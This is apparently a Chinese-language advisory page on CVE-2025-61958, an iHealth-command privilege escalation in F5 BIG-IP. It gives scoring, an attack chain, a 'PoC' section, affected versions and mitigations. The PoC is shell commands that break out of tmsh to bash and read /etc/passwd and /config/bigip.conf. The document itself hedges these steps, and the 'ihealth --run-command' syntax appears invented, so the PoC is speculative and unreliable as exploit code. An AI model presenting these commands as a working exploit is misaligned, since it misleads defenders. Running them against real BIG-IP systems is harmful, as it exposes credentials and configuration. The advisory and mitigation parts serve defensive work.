CVE-2025-61958 F5 BIG-IP iHealth命令权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-61958

漏洞类型

权限提升/安全边界绕过

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP

漏洞概述

CVE-2025-61958是F5 BIG-IP系统中iHealth命令存在的一个高危安全漏洞。该漏洞允许经过认证的攻击者（至少需要资源管理员角色）通过iHealth命令绕过tmsh（TMOS Shell）的安全限制，从而获取对底层bash shell的访问权限。对于以Appliance模式运行的BIG-IP系统，成功利用此漏洞可以使攻击者跨越安全边界，获取超出其权限范围的系统访问能力。

该漏洞的CVSS 3.1评分为8.7分，属于高危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要高权限认证（PR:H），无需用户交互（UI:N）。漏洞对系统的机密性（C:H）和完整性（I:H）均产生高影响，但对可用性（A:N）无直接影响。范围变化（S:C）表明该漏洞的影响超出了其自身的安全上下文。

此漏洞由F5安全事件响应团队（[email protected]）发现并报告，于2025年10月15日正式披露。需要注意的是，已经达到技术支持终止（EoTS）状态的软件版本不在评估范围内。用户应及时关注F5官方发布的安全公告K000154647，并尽快应用相应的修复补丁。

技术细节

该漏洞的核心问题在于F5 BIG-IP系统的iHealth命令实现中缺乏足够的安全检查。iHealth是BIG-IP系统中用于诊断和健康检查的工具，其命令行接口在设计时可能未充分考虑权限隔离问题。

在正常情况下，具有资源管理员（Resource Administrator）角色的用户只能通过tmsh（TMOS Shell）执行有限的管理操作。tmsh作为BIG-IP系统的命令行管理界面，设计了一套严格的权限控制机制来限制不同角色用户的操作范围。然而，由于iHealth命令的实现缺陷，攻击者可以利用该命令作为跳板，绕过tmsh的安全限制机制。

具体而言，攻击者可以通过精心构造的iHealth命令调用，触发系统执行bash shell命令。由于iHealth命令在执行过程中可能以更高的权限上下文运行，或者未能正确过滤和限制其子进程的执行权限，导致攻击者能够突破tmsh的安全沙箱，获得bash shell的直接访问权限。

对于运行在Appliance模式下的BIG-IP系统，安全边界的设计更加严格，该模式旨在限制用户只能通过受控的管理界面进行操作。成功利用此漏洞后，攻击者将能够跨越这一安全边界，获取对系统底层文件系统和进程的访问权限，从而可能读取敏感配置文件、修改系统设置或执行其他恶意操作。

攻击链分析

STEP 1

步骤1：初始访问

攻击者通过合法途径获取BIG-IP系统的资源管理员（Resource Administrator）角色凭证，通常通过钓鱼、社会工程或利用其他漏洞获取。

STEP 2

步骤2：建立连接

攻击者使用获取的凭证通过SSH或HTTPS等方式登录到BIG-IP系统的tmsh管理界面。

STEP 3

步骤3：漏洞利用

攻击者在tmsh环境中调用iHealth命令，利用该命令实现中的安全缺陷，绕过tmsh的权限限制机制。

STEP 4

步骤4：获取Shell访问

通过构造恶意的iHealth命令参数，攻击者成功获取对底层bash shell的访问权限。

STEP 5

步骤5：跨越安全边界

对于Appliance模式的系统，攻击者利用获得的bash访问权限跨越预定的安全边界，访问受限的系统资源和敏感数据。

STEP 6

步骤6：后续利用

攻击者读取敏感配置文件、修改系统设置、植入后门或利用获取的权限进行横向移动，进一步危害整个系统安全。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61958 - F5 BIG-IP iHealth Command Privilege Escalation PoC
# This PoC demonstrates the concept of bypassing tmsh restrictions via iHealth command
# Note: Requires authenticated access with at least Resource Administrator role

# Step 1: Authenticate to the BIG-IP system via SSH or tmsh
ssh admin@<bigip_target_ip>

# Step 2: Attempt to bypass tmsh restrictions using iHealth command
# The iHealth command can be abused to execute bash shell commands
# bypassing the normal tmsh security controls

# Method 1: Using iHealth with command injection
tmsh
# Within tmsh shell, attempt to invoke iHealth with malicious parameters
run util bash -c "id"

# Method 2: Direct iHealth command abuse
# If iHealth allows spawning subprocesses, use it to gain bash access
ihealth --check --run-command="/bin/bash"

# Step 3: Verify privilege escalation
# After successful exploitation, check if bash shell access is obtained
whoami
cat /etc/passwd

# Step 4: For Appliance mode systems, verify security boundary crossing
# Access files outside the normal tmsh restricted environment
ls -la /config/
cat /config/bigip.conf

# Expected result: Access to bash shell with elevated privileges
# allowing operations beyond the Resource Administrator role scope

影响范围

F5 BIG-IP 17.x（具体受影响版本需参考F5官方公告K000154647）

F5 BIG-IP 16.x（具体受影响版本需参考F5官方公告K000154647）

F5 BIG-IP 15.x（具体受影响版本需参考F5官方公告K000154647）

F5 BIG-IP 14.x（具体受影响版本需参考F5官方公告K000154647）

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）严格审查所有资源管理员账户，确保只有必要的人员拥有该权限；2）监控iHealth命令的使用日志，识别异常调用行为；3）如果业务允许，临时禁用iHealth功能；4）加强管理网络的网络隔离，限制可访问BIG-IP管理界面的IP地址范围；5）启用详细的审计日志，记录所有tmsh命令执行情况，便于事后分析。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61958
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61958
3 Details https://www.cvedetails.com/cve/CVE-2025-61958/
4 VulDB https://vuldb.com/cve/CVE-2025-61958
5 Link https://my.f5.com/manage/s/article/K000154647